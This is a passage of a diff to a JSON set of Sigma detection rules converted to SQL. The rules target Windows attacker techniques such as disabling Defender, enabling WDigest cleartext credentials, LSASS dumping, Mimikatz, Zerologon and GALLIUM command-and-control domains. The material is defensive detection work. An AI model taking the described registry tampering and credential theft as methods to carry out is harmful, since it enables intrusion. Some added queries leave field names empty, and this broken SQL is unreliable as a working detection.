"Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. 
The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" 
+ "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 
'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE 
'%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE 
'\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE 
'%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - 
"attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - 
"attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": 
